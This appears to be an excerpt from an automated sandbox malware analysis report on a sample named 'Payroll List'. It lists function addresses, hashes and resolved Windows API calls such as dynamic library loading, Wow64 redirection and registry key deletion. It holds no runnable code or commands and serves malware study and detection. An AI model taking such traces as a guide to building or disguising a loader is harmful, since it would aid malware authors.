                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RoInitialize$combase.dll
                                                                    • API String ID: 2574300362-340411864
                                                                    • Opcode ID: 5293afc42d2fc2add3219070633c2edf3911dbdf5409ce2847e15a72559c943c
                                                                    • Instruction ID: 8915005695638b4aa57aa48e9df936cda168b42160bc3226f93248f96680719e
                                                                    • Opcode Fuzzy Hash: 5293afc42d2fc2add3219070633c2edf3911dbdf5409ce2847e15a72559c943c
                                                                    • Instruction Fuzzy Hash: 13E01A74691750ABDB115FB0EC89B193B64AB09702F404020F102DE8F0DBF884C0CF08
                                                                    Function 0014235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00142276), ref: 00142376
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0014237D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RoUninitialize$combase.dll
                                                                    • API String ID: 2574300362-2819208100
                                                                    • Opcode ID: 6a2094838726b8c4a8dfdca63b3602e9b306f6be4b6934feecdecaa8d58fa574
                                                                    • Instruction ID: 7484cc3182ab838b0dc59da985ea477251eeef384891581e7078262eb4440814
                                                                    • Opcode Fuzzy Hash: 6a2094838726b8c4a8dfdca63b3602e9b306f6be4b6934feecdecaa8d58fa574
                                                                    • Instruction Fuzzy Hash: F9E0B674686740ABDB229FA0FD4DB083A65BB09702F520455F10ADACB0CBF898C0CA14
                                                                    Function 0019AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime__swprintf
                                                                    • String ID: %.3d$WIN_XPe
                                                                    • API String ID: 2070861257-2409531811
                                                                    • Opcode ID: 52a783abf61a8e174efdbe675234b2d6c5a5c043372905f390ae8babb6f688c5
                                                                    • Instruction ID: 83c63ebbdf1e7a2cd36a97f5b6290e17354892cd3168da964e92136416e32a76
                                                                    • Opcode Fuzzy Hash: 52a783abf61a8e174efdbe675234b2d6c5a5c043372905f390ae8babb6f688c5
                                                                    • Instruction Fuzzy Hash: BAE012B1804618EBCF189750ED09DF9737CAF04741F910493B906A5510D7359BC8EB53
                                                                    Function 00182205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,001821FB,?,001823EF), ref: 00182213
                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00182225
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetProcessId$kernel32.dll
                                                                    • API String ID: 2574300362-399901964
                                                                    • Opcode ID: 219b48928c09071cd4822121244f45ca942c92897929f2bd34c834dc39b889ae
                                                                    • Instruction ID: a9c8e84f14cf1c53911ec57c8e03ad46518d756baec20c33ae826eb2c0be4e30
                                                                    • Opcode Fuzzy Hash: 219b48928c09071cd4822121244f45ca942c92897929f2bd34c834dc39b889ae
                                                                    • Instruction Fuzzy Hash: B2D0A734400B129FC7225F70F808601B7D5EF07300B00441AE856E2A50D770D8C08B50
                                                                    Function 001242F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,001242EC,?,001242AA,?), ref: 00124304
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00124316
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-1355242751
                                                                    • Opcode ID: c31c74d7a2d64a4a1e7145205aff125ebd58914cf5c9c09ddc9b2e0ab7a7f708
                                                                    • Instruction ID: a3fd0c951e63f5b25b54a6b5cf54e2d9107456f540f8b76614f42bc66e2e7921
                                                                    • Opcode Fuzzy Hash: c31c74d7a2d64a4a1e7145205aff125ebd58914cf5c9c09ddc9b2e0ab7a7f708
                                                                    • Instruction Fuzzy Hash: 2FD0A930800B32AFC7208F60F84C60677E8BF16301B00842AE8ABD2A60EBB0C8C08A10
                                                                    Function 0012434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,001241BB,00124341,?,0012422F,?,001241BB,?,?,?,?,001239FE,?,00000001), ref: 00124359
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0012436B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-3689287502
                                                                    • Opcode ID: 9982647c2b6662e5fc871f57331e353a8e493645ad0de2e23e819f86c26aa9dc
                                                                    • Instruction ID: 71c6242e21f7fa76ce4bb954b27bedaa18786d7108eb113b7cc477e81e5b6229
                                                                    • Opcode Fuzzy Hash: 9982647c2b6662e5fc871f57331e353a8e493645ad0de2e23e819f86c26aa9dc
                                                                    • Instruction Fuzzy Hash: 89D0A730800B329FC724CF70F80860177D4BF22725B00451AE492D2A50D7B0D8C08610
                                                                    Function 00160539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,0016051D,?,001605FE), ref: 00160547
                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00160559
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                    • API String ID: 2574300362-1071820185
                                                                    • Opcode ID: be3c48152d1c9dcaffa8fa24ddd48236ba94171efd52ba59f8c90402da3113e4
                                                                    • Instruction ID: f07818532ebdada0e5b7275ad2e0a38ab96e9b858fca46a87fdb005ddd25a401
                                                                    • Opcode Fuzzy Hash: be3c48152d1c9dcaffa8fa24ddd48236ba94171efd52ba59f8c90402da3113e4
                                                                    • Instruction Fuzzy Hash: E9D0C771554B229FD7219F65FC0964676E4AB15711B10C81EE457D2A60D770CCC08A50
                                                                    Function 00160564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0016052F,?,001606D7), ref: 00160572
                                                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00160584
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                    • API String ID: 2574300362-1587604923
                                                                    • Opcode ID: 8e63e4b8ffeff7275fcb912a9a4cdc6a70e1e01147186ef509cd5b01f4210d8c
                                                                    • Instruction ID: ad1d1b6fd79e13870d6be6472e48c85d660c6ef47c474edbc22165a764341ed1
                                                                    • Opcode Fuzzy Hash: 8e63e4b8ffeff7275fcb912a9a4cdc6a70e1e01147186ef509cd5b01f4210d8c
                                                                    • Instruction Fuzzy Hash: CED0C7715047229FD7215F75FC09B4777E4AB19711B11891FE857D2A50D770D9C08A60
                                                                    Function 0017ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0017ECBE,?,0017EBBB), ref: 0017ECD6
                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0017ECE8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                    • API String ID: 2574300362-1816364905
                                                                    • Opcode ID: 3670d5ac1a2afa787e541f09c9b6f5cbc62a332eb920f1e5d3841beb5229caec
                                                                    • Instruction ID: 59cedf6188585e369397c6e91bd0338c47a0542faf63ca253b8c78093c3610d2
                                                                    • Opcode Fuzzy Hash: 3670d5ac1a2afa787e541f09c9b6f5cbc62a332eb920f1e5d3841beb5229caec
                                                                    • Instruction Fuzzy Hash: 8FD0A735400B239FCB215F60F84860277F4AF06300B00C45EF85AD2A50DB70C8C08A10
                                                                    Function 0017BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0017BAD3,00000001,0017B6EE,?,001BDC00), ref: 0017BAEB
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0017BAFD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                    • API String ID: 2574300362-199464113
                                                                    • Opcode ID: 325fb0c2e21eb2bad40b431f8bd4a01a22dfc58ece6a6d0bb7602012cb0081d1
                                                                    • Instruction ID: bcb600e9cb0bd27457b8a1c4e6e3c7306137f8727dab017e07f36aa1a53bd6c6
                                                                    • Opcode Fuzzy Hash: 325fb0c2e21eb2bad40b431f8bd4a01a22dfc58ece6a6d0bb7602012cb0081d1
                                                                    • Instruction Fuzzy Hash: 94D0A930A04B129FC7305F60F888B5277E8AF0A300B00C42AEC9BD3A50EBB0C8C0CA10
                                                                    Function 00183BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00183BD1,?,00183E06), ref: 00183BE9
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00183BFB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2574300362-4033151799
                                                                    • Opcode ID: 74751cf35d32f578ee9088905a5b54bbc909396f834fb95be67f7b2ab082f424
                                                                    • Instruction ID: 022e34d3ce71db294a0f0ffac381f867b5960596779433617c7328b8cb3f3445
                                                                    • Opcode Fuzzy Hash: 74751cf35d32f578ee9088905a5b54bbc909396f834fb95be67f7b2ab082f424
                                                                    • Instruction Fuzzy Hash: 99D0C775500B529FD7206FA5F819647FAF4AB07715B14441BE457E2A50D7B0D5C08F50
                                                                    Function 00159B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 80c994e1647d6ba242d03c07bd882fa404d6c724b68963a67bef488883ca6da7
                                                                    • Instruction ID: 0fd90510fb21e69c079e647ee1bb0787648e3f3f2042bd6ef7826c4c13b23c8a
                                                                    • Opcode Fuzzy Hash: 80c994e1647d6ba242d03c07bd882fa404d6c724b68963a67bef488883ca6da7
                                                                    • Instruction Fuzzy Hash: 6CC15B75A0021AEFCB14CF94C884AAEB7B5FF48705F104598ED26AF251D730EE45DB91
                                                                    Function 0017AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 0017AAB4
                                                                    • CoUninitialize.OLE32 ref: 0017AABF
                                                                      • Part of subcall function 00160213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0016027B
                                                                    • VariantInit.OLEAUT32(?), ref: 0017AACA
                                                                    • VariantClear.OLEAUT32(?), ref: 0017AD9D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                    • String ID:
                                                                    • API String ID: 780911581-0
                                                                    • Opcode ID: 632f42e4dbdbc3cd21de9cdf8d1b4a40d8e32de1a9bf78aef1ebbe3b29a2a5a8
                                                                    • Instruction ID: b38b39b8da29ccdec941c524afc42f1376fc9e3d6d27735661f3a3fefa5f420a
                                                                    • Opcode Fuzzy Hash: 632f42e4dbdbc3cd21de9cdf8d1b4a40d8e32de1a9bf78aef1ebbe3b29a2a5a8
                                                                    • Instruction Fuzzy Hash: 8AA146752047119FCB15EF64C881A1EB7F5BF98710F548449FA9A9B3A2CB30ED40CB86
                                                                    Function 001591CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                    • String ID:
                                                                    • API String ID: 2808897238-0
                                                                    • Opcode ID: 80c42aa59535990e0e120d405e8aab1c52e8481866c2e60abd3aaa5f65b56a1d
                                                                    • Instruction ID: 8f52c2f869bc97d9d45630b96cb95015b3f1783bb7f95446c42497caf62e9afc
                                                                    • Opcode Fuzzy Hash: 80c42aa59535990e0e120d405e8aab1c52e8481866c2e60abd3aaa5f65b56a1d
                                                                    • Instruction Fuzzy Hash: F551A330A04306DBDB649F75D491A6EB3E5FF59311F20882FE9A6CF6D1DB7498888702
                                                                    Function 0014365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                    • String ID:
                                                                    • API String ID: 3877424927-0
                                                                    • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                    • Instruction ID: 395d9cdbad43f8cf73eafa58a906889672f743256acfa7862996559d6361e290
                                                                    • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                    • Instruction Fuzzy Hash: 5A51A7B0A00206ABDB289FA988856AE77B1AF50330F258729F875962F0D7719F519F50
                                                                    Function 0018C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(00D35B08,?), ref: 0018C544
                                                                    • ScreenToClient.USER32(?,00000002), ref: 0018C574
                                                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0018C5DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: 20b5bf78d5ff48797fae8b8460f11e5646f9a79c89ad9dbb02ef146ae1939e1e
                                                                    • Instruction ID: b7fe339349ee6dad173a76787eb772ccb5f7601993f155582ea566462a59a7be
                                                                    • Opcode Fuzzy Hash: 20b5bf78d5ff48797fae8b8460f11e5646f9a79c89ad9dbb02ef146ae1939e1e
                                                                    • Instruction Fuzzy Hash: BA513F75A00605EFCF10EF68D8809AE77B6EF55320F248669F9559B290D770EE81CFA0
                                                                    Function 0015C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0015C462
                                                                    • __itow.LIBCMT ref: 0015C49C
                                                                      • Part of subcall function 0015C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0015C753
                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0015C505
                                                                    • __itow.LIBCMT ref: 0015C55A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
